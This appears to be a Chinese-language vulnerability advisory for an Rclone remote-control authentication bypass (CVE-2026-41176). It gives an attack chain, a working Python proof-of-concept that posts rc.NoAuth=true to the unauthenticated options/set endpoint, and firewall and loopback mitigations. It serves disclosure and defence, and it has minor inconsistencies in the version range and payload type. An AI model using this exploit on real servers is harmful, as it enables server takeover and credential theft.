CVE-2026-41176 CVSS 9.8 严重

CVE-2026-41176 Rclone RC接口认证绕过漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41176

漏洞类型

认证绕过

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Rclone

漏洞概述

Rclone是一款命令行文件同步工具。在1.45.0至1.73.5版本中，其RC（远程控制）接口的`options/set`端点缺少身份验证机制。攻击者可利用该漏洞向该端点发送请求，将`rc.NoAuth`参数设置为`true`，从而禁用服务器的授权检查。这导致攻击者无需认证即可访问原本受保护的敏感管理功能，包括修改配置和执行文件操作。

技术细节

该漏洞源于Rclone RC服务器对配置修改端点的访问控制逻辑缺陷。Rclone的RC接口用于远程管理服务，部分敏感操作默认要求认证。然而，`options/set`端点被暴露时未设置`AuthRequired: true`属性，允许未授权的HTTP请求修改全局运行时配置。攻击者只需向`/options/set`发送包含`{"rc.NoAuth": true}`的JSON POST请求，即可覆盖安全策略。由于配置更改立即生效，后续对任何标记为`AuthRequired: true`的API端点（如`rc/list`、`sync/copy`等）的请求将绕过认证检查，导致服务器完全被接管。

攻击链分析

STEP 1

侦察阶段

攻击者扫描网络或端口，发现目标主机上开放的Rclone RC服务接口（默认端口5572）。

STEP 2

漏洞利用

攻击者向未授权的`/options/set`端点发送特制的POST请求，请求体中包含`{"rc.NoAuth": true}`。

STEP 3

权限提升

Rclone服务接收请求并更新全局配置，将`rc.NoAuth`标志设为true，导致所有端点的认证检查被禁用。

STEP 4

数据窃取或破坏

攻击者利用获取的权限，调用敏感API（如`operations/list`、`config/dump`）查看文件系统、窃取凭证或执行恶意同步操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-41176
# Exploit by setting rc.NoAuth to true via unauthenticated endpoint

import requests
import json

def exploit(target_url):
    # Target endpoint to modify configuration
    endpoint = f"{target_url}/options/set"
    
    # Payload to disable authentication
    payload = {
        "rc.NoAuth": "true"
    }
    
    headers = {
        "Content-Type": "application/json"
    }
    
    try:
        print(f"[*] Sending payload to {endpoint}...")
        response = requests.post(endpoint, data=json.dumps(payload), headers=headers)
        
        if response.status_code == 200:
            print("[+] Exploit successful! Authentication disabled.")
            print("[+] Response:", response.text)
        else:
            print(f"[-] Exploit failed. Status code: {response.status_code}")
            print("[-] Response:", response.text)
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    # Example usage: python poc.py http://127.0.0.1:5572
    import sys
    if len(sys.argv) < 2:
        print("Usage: python poc.py <target_url>")
        sys.exit(1)
    exploit(sys.argv[1])

影响范围

Rclone >= 1.45.0, < 1.73.5

防御指南

临时缓解措施

如果无法立即升级，建议将Rclone的RC服务绑定到本地回环地址（127.0.0.1），避免暴露在公网。同时，利用系统防火墙（如iptables或Windows防火墙）限制入站流量，仅允许受信任的IP地址访问RC端口。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表